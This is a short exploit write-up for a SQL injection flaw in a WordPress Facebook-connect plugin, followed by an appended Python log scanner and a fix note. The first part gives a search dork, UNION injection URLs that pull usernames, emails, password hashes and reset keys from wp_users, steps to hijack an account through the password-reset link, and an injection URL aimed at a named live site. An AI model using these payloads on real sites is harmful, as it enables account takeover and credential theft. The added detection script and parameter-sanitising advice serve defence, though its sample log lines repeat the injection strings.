WordPress Exploit
DORK['1']: inurl:"/?fbconnect_action=myhome"
http://VULL.COM/?fbconnect_action=myhome&userid=2 [BUG-SQL]
EXPLOIT:
Showing user, email, password (user_login, user_email, user_pass):
http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--
With the user's email in hand, go to the administrator panel.
http://VULL.COM/wp-login.php
Click "Lost your password?"
And request a new password, to be sent to the e-mail address.
Now let's query the KEY generated by WordPress. FIELD:KEY=user_activa
http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12+from+wp_users--
Let's change the user's password with the CAPTURED KEY
http://VULL.COM/wp-login.php?action=rp&key=[KEY]&login=[NOME_USUARIO]
USING:
http://VULL.COM/wp-login.php?action=rp&key=65465465AWDAD46546465464&login=MARIA
Done, now just change the user's password and be happy, Hackeiro hahahahahaahaha.
EXAMPLE:
http://www.artkernel.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--
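DETECTION (added example, not part of the original page): the requests above leave a clear trace in the web server access log, because a legitimate fbuserid/userid value is digits only. The script below flags non-numeric values on fbconnect_action requests and any later wp-login.php?action=rp request from the same client; the log lines, IP addresses and key values are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation-range IPs, made-up keys).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2014:10:00:01 +0000] "GET /?fbconnect_action=myhome&fbuserid=2 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Mar/2014:10:02:11 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 200 4980
203.0.113.9 - - [10/Mar/2014:10:02:40 +0000] "GET /wp-login.php?action=rp&key=CONSTRUCTEDKEY&login=MARIA HTTP/1.1" 200 2210
198.51.100.7 - - [10/Mar/2014:10:05:00 +0000] "GET /wp-login.php?action=rp&key=CONSTRUCTEDKEY2&login=bob HTTP/1.1" 200 2210
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')
ID_PARAMS = ("fbuserid", "userid")      # parameter names that appear on the page
NUMERIC = re.compile(r"[0-9]+")

def scan(log_text):
    """Return (injection_hits, reset_followups); each is a list of (ip, detail)."""
    injections, followups, flagged_ips = [], [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        q = parse_qs(url.query, keep_blank_values=True)
        if "fbconnect_action" in q:
            for name in ID_PARAMS:
                for value in q.get(name, []):
                    # A real user id is digits only; anything else is suspect.
                    if not NUMERIC.fullmatch(value):
                        injections.append((ip, value))
                        flagged_ips.add(ip)
        elif url.path.endswith("/wp-login.php") and q.get("action") == ["rp"]:
            # Reset completion by a client that already sent a suspect plugin request.
            if ip in flagged_ips:
                followups.append((ip, q.get("login", [""])[0]))
    return injections, followups

if __name__ == "__main__":
    hits, resets = scan(SAMPLE_LOG)
    print("suspect fbconnect requests:", hits)
    print("password resets to review:", resets)
```

Accounts named in the second list should have their passwords and pending reset keys rotated. The fix itself belongs in the plugin: cast the id parameter to an integer or pass it through $wpdb->prepare() before it reaches the query.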